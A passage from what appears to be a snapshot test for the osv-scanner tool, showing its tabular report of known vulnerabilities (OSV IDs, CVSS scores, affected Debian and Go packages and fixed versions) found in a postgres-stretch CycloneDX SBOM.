testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-11187 | 6.1 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-15468 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-15469 | 5.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | 
testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-4575 | 6.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-66199 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-9231 | 6.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-2673 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5902-1 | 8.4 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-12837 | 7.5 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-12883 | 9.1 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-12015 | 7.5 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-18311 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-18312 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-18313 | 9.1 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-18314 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-6797 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-6798 | 7.5 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | 
https://osv.dev/DEBIAN-CVE-2018-6913 | 9.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-10543 | 8.2 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-10878 | 8.6 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-12723 | 7.5 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-16156 | 8.1 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-31484 | | | | | | | | https://osv.dev/DLA-3926-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2021-36770 | 7.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-47038 | 7.8 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-40909 | 5.9 | Debian | perl | 5.24.1-3+deb9u7 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5135-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3072-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3189-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3316-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3422-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3600-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | 
https://osv.dev/DLA-3651-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3764-1 | | Debian | postgresql-11 | 11.15-1.pgdg90+1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-17512 | 8.8 | Debian | sensible-utils | 0.0.9+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-20482 | 4.7 | Debian | tar | 1.29b-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-39804 | 6.2 | Debian | tar | 1.29b-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3755-1 | | | | | | | | https://osv.dev/DLA-3051-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3134-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3161-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3366-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3412-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3684-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3788-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3972-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4085-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4105-1 | | Debian | tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4403-1 | | Debian | 
tzdata | 2021a-0+deb9u3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4016-1 | | Debian | ucf | 3.0036 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5055-1 | 5.5 | Debian | util-linux | 2.29.2-1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5650-1 | 5.5 | Debian | util-linux | 2.29.2-1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2016-2779 | 7.8 | Debian | util-linux | 2.29.2-1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-3184 | | Debian | util-linux | 2.29.2-1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5123-1 | 8.8 | Debian | xz-utils | 5.2.2-1.2+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5895-1 | 8.7 | Debian | xz-utils | 5.2.2-1.2+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-3094 | 10.0 | Debian | xz-utils | 5.2.2-1.2+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | +---------------------------------------+------+-----------+--------------------------------+------------------------------------+-----------------------------------+-------------------------------------------------+ --- [TestCommand_LocalDatabases/one_specific_supported_sbom_with_vulns - 2] --- [TestCommand_LocalDatabases/one_specific_supported_sbom_with_vulns - 3] Scanning dir ./testdata/sbom-insecure/postgres-stretch.cdx.xml Scanned /testdata/sbom-insecure/postgres-stretch.cdx.xml file and found 136 packages Filtered 1 local/unscannable package/s from the scan. Loaded Debian local db from /osv-scanner/Debian/all.zip Loaded Go local db from /osv-scanner/Go/all.zip Total 21 packages affected by 168 known vulnerabilities (18 Critical, 70 High, 53 Medium, 3 Low, 24 Unknown) from 2 ecosystems. 11 vulnerabilities can be fixed. 
+---------------------------------------+------+-----------+--------------------------------+------------------------------------+-----------------------------------+-------------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +---------------------------------------+------+-----------+--------------------------------+------------------------------------+-----------------------------------+-------------------------------------------------+ | https://osv.dev/GO-2022-0274 | 6.0 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.0 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-v95c-p5hm-xq8f | | | | | | | | https://osv.dev/GO-2022-0452 | 5.9 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.2 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-f3fp-gc8g-vw66 | | | | | | | | https://osv.dev/GO-2023-1627 | 7.0 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.5 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-vpvm-3wq2-2wvm | | | | | | | | https://osv.dev/GO-2023-1682 | 2.5 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.5 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-m8cg-xc2p-r3fc | | | | | | | | https://osv.dev/GO-2023-1683 | 6.1 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.5 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-g2j6-57v7-gm8c | | | | | | | | https://osv.dev/GO-2024-2491 | 8.6 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.12 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-xr7r-f8xq-vfvv | | | | | | | | https://osv.dev/GO-2024-3110 | 4.8 | Go | github.com/opencontainers/runc | v1.0.1 | 1.1.14 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-jfvp-7x6p-h2pv | | | | | | | | https://osv.dev/GO-2025-4096 | 7.3 | Go | github.com/opencontainers/runc | v1.0.1 | 1.2.8 | 
testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-9493-h29p-rfm2 | | | | | | | | https://osv.dev/GO-2025-4097 | 7.3 | Go | github.com/opencontainers/runc | v1.0.1 | 1.2.8 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-qw9x-cqr3-wc7r | | | | | | | | https://osv.dev/GO-2025-4098 | 7.3 | Go | github.com/opencontainers/runc | v1.0.1 | 1.2.8 | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-cgrx-mc8f-2prm | | | | | | | | https://osv.dev/GO-2022-0493 | 5.3 | Go | golang.org/x/sys | v0.0.0-20210817142637-7d9622a276b7 | 0.0.0-20220412211240-33da011f77ad | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/GHSA-p782-xgp4-8hr8 | | | | | | | | https://osv.dev/DSA-4685-1 | 5.5 | Debian | apt | 1.4.11 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4808-1 | 5.7 | Debian | apt | 1.4.11 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0501 | 5.9 | Debian | apt | 1.4.11 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-3462 | 8.1 | Debian | apt | 1.4.11 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3715 | 7.8 | Debian | bash | 4.4-5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2016-2781 | 6.5 | Debian | coreutils | 8.26-3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2024-0684 | 5.5 | Debian | coreutils | 8.26-3 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3482-1 | | Debian | debian-archive-keyring | 2017.5+deb9u2 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5147-1 | 9.8 | Debian | dpkg | 1.18.25 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-6297 | 8.2 | Debian | dpkg | 1.18.25 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | 
https://osv.dev/DEBIAN-CVE-2026-2219 | 7.5 | Debian | dpkg | 1.18.25 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4535-1 | 7.5 | Debian | e2fsprogs | 1.43.4-2+deb9u2 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-5188 | 6.7 | Debian | e2fsprogs | 1.43.4-2+deb9u2 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-1304 | 7.8 | Debian | e2fsprogs | 1.43.4-2+deb9u2 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3910-1 | | | | | | | | https://osv.dev/DSA-5122-1 | 8.8 | Debian | gzip | 1.6-5+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-0379 | 7.5 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-7526 | 6.8 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0495 | 4.7 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-13627 | 6.3 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-33560 | 7.5 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-40528 | 5.9 | Debian | libgcrypt20 | 1.7.6-2+deb9u4 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5863-1 | 5.3 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-10790 | 7.5 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-6003 | 7.5 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | 
https://osv.dev/DEBIAN-CVE-2021-46848 | 9.1 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-3263-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2025-13151 | 7.5 | Debian | libtasn1-6 | 4.10-1.1+deb9u1 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5142-1 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5271-1 | 7.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5391-1 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5990-1 | | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2016-3709 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-2309 | | | | | | | | https://osv.dev/DLA-3878-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2016-9318 | 5.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-0663 | 7.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-15412 | 8.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-16931 | 9.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-16932 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-18258 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | 
https://osv.dev/DEBIAN-CVE-2017-5130 | 8.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-5969 | 4.7 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-7375 | 9.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-7376 | 9.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-8872 | 9.1 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-9047 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-9048 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-9049 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2017-9050 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-14404 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-14567 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-19956 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-20388 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2020-7595 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | 
testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3516 | 7.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3517 | 8.6 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3518 | 8.8 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3537 | 5.9 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3541 | 6.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-23308 | 7.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2025-9714 | 5.5 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DLA-4319-1 | | | | | | | | https://osv.dev/DEBIAN-CVE-2026-0989 | 3.7 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-0990 | 5.9 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2026-0992 | 2.9 | Debian | libxml2 | 2.9.4+dfsg1-2.2+deb9u6 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4539-1 | 4.7 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4539-3 | | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4661-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4807-1 | 5.9 | Debian | openssl | 
1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4855-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4875-1 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-4963-1 | 9.8 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5103-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5139-1 | 7.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5169-1 | 7.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5343-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5417-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5532-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-5764-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-6015-1 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DSA-6113-1 | 9.8 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0732 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0734 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-0735 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | 
testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2018-5407 | 4.7 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-1543 | 7.4 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2019-1549 | 5.3 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2021-3450 | 7.4 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-2274 | 9.8 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3358 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3602 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3786 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-3996 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2022-4203 | 4.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-0216 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-0217 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-0401 | 7.5 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | https://osv.dev/DEBIAN-CVE-2023-1255 | 5.9 | Debian | openssl | 1.1.0l-1~deb9u5 | -- | testdata/sbom-insecure/postgres-stretch.cdx.xml | | 
